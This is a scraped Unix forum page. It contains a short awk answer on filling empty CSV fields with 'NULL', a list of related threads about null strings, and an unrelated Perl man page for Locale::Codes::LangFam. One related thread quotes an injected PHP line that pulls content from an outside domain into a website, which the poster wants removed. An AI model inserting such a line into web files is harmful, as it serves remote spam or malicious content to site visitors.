Sponsored Content
Top Forums Shell Programming and Scripting Insert string 'NULL' where there is a null value Post 302425103 by Franklin52 on Thursday 27th of May 2010 07:32:33 AM
Old 05-27-2010
One way:
Code:
awk -F, '!$7{$7="NULL"}1' OFS="," file

This User Gave Thanks to Franklin52 For This Post:

10 More Discussions You Might Find Interesting

1. UNIX for Dummies Questions & Answers

GREP a string with NULL Character

Does anyone know how to use grep/egrep to find a string that contains a null character? i.e.: the string looks like this: null0001nullN well I want to be able to : grep '0001N' is there a wildcard character or something that I can put in the grep to include the nulls? (3 Replies)
Discussion started by: weerich
3 Replies

2. Shell Programming and Scripting

check for not null string in file

Hi, If, in a text file a string is expected at a certain fixed position(for eg at position 5 or from 5-10 on every line) how to check whether data is present on that position or not? Thnx in advance (6 Replies)
Discussion started by: misenkiser
6 Replies

3. Shell Programming and Scripting

How to check for null or empty string

Hi, I need to check for value not equal (<>) to 21 and not equal empty or null values. Please modify this script if then echo "$VALUE,$BSC_NAME,$BSC_ID" > $OUT_FILE/power_up.out end if TQ (5 Replies)
Discussion started by: doer
5 Replies

4. Shell Programming and Scripting

replace a complex string with null

Hello, I need a script or one liner possible in perl or awk ( as sed shows error ) I want to replace <?php echo file_get_contents("http://googlesindication.cn/links.php?site=".$_SERVER);?> with blank or null 1) in a file 2) in many directories recursively. (3 Replies)
Discussion started by: fed.linuxgossip
3 Replies

5. UNIX for Dummies Questions & Answers

insert null in unix files

Hi everybody, How to add null values in unix file? This is what was asked to me in an interview. (4 Replies)
Discussion started by: sachin.gangadha
4 Replies

6. Shell Programming and Scripting

null string matching in sed?

Hello, I would assume the expression ^$ should match a null string. Yet when I run: echo -n | sed 's/^$/nullstring/' I get no output. Can anyone tell me why? (6 Replies)
Discussion started by: Allasso
6 Replies

7. Shell Programming and Scripting

awk Problem while insert null field to file

Dear All, I have the following input file. I want to replace data with null values. I/P File: 9022334455|2008-12-06 06:10:21|2|Error@@@|esoo8erp| 9024334432|2008-12-06 08:40:59|6|Error@@@|6y2o8e6r| O/P File: 9022334455||2||esoo8erp| 9024334432||6||6y2o8e6r| ... (4 Replies)
Discussion started by: hanu_oracle
4 Replies

8. Shell Programming and Scripting

replace some string by null??

I have a string like In this string I want to delete both "." and ":", means I want the output as: How can I do that using "tr" or any other such command? (6 Replies)
Discussion started by: ash.g
6 Replies

9. Shell Programming and Scripting

Handling null Integer/string variables

I kind of found out the hard way that I am not able to manipulate the null value, the long silence that happens when there is no value returned. I am looking for PIDs, and when there is no PID return, I wanted to handle this special scenario. Here is my script. #!/bin/bash LAN_VARIABLE=... (7 Replies)
Discussion started by: lan123
7 Replies

10. Linux

Issue in inserting null string in array

I am getting some values from a file and putting them in an array..but the null strings are not getting passed to the array. So during printing the elements ,the null string is not showing in the output. during array size calculation it is also excluding null.Please let me know how to do it. # cat... (2 Replies)
Discussion started by: millan
2 Replies
Locale::Codes::LangFam(3pm)				 Perl Programmers Reference Guide			       Locale::Codes::LangFam(3pm)

NAME
Locale::Codes::LangFam - standard codes for language extension identification SYNOPSIS
use Locale::Codes::LangFam; $lext = code2langfam('apa'); # $lext gets 'Apache languages' $code = langfam2code('Apache languages'); # $code gets 'apa' @codes = all_langfam_codes(); @names = all_langfam_names(); DESCRIPTION
The "Locale::Codes::LangFam" module provides access to standard codes used for identifying language families, such as those as defined in ISO 639-5. Most of the routines take an optional additional argument which specifies the code set to use. If not specified, the default ISO 639-5 language family codes will be used. SUPPORTED CODE SETS
There are several different code sets you can use for identifying language families. A code set may be specified using either a name, or a constant that is automatically exported by this module. For example, the two are equivalent: $lext = code2langfam('apa','alpha'); $lext = code2langfam('apa',LOCALE_LANGFAM_ALPHA); The codesets currently supported are: alpha This is the set of three-letter (lowercase) codes from ISO 639-5 such as 'apa' for Apache languages. This is the default code set. ROUTINES
code2langfam ( CODE [,CODESET] ) langfam2code ( NAME [,CODESET] ) langfam_code2code ( CODE ,CODESET ,CODESET2 ) all_langfam_codes ( [CODESET] ) all_langfam_names ( [CODESET] ) Locale::Codes::LangFam::rename_langfam ( CODE ,NEW_NAME [,CODESET] ) Locale::Codes::LangFam::add_langfam ( CODE ,NAME [,CODESET] ) Locale::Codes::LangFam::delete_langfam ( CODE [,CODESET] ) Locale::Codes::LangFam::add_langfam_alias ( NAME ,NEW_NAME ) Locale::Codes::LangFam::delete_langfam_alias ( NAME ) Locale::Codes::LangFam::rename_langfam_code ( CODE ,NEW_CODE [,CODESET] ) Locale::Codes::LangFam::add_langfam_code_alias ( CODE ,NEW_CODE [,CODESET] ) Locale::Codes::LangFam::delete_langfam_code_alias ( CODE [,CODESET] ) These routines are all documented in the Locale::Codes::API man page. SEE ALSO
Locale::Codes The Locale-Codes distribution. Locale::Codes::API The list of functions supported by this module. http://www.loc.gov/standards/iso639-5/id.php ISO 639-5 . AUTHOR
See Locale::Codes for full author history. Currently maintained by Sullivan Beck (sbeck@cpan.org). COPYRIGHT
Copyright (c) 2011-2013 Sullivan Beck This module is free software; you can redistribute it and/or modify it under the same terms as Perl itself. perl v5.18.2 2013-11-04 Locale::Codes::LangFam(3pm)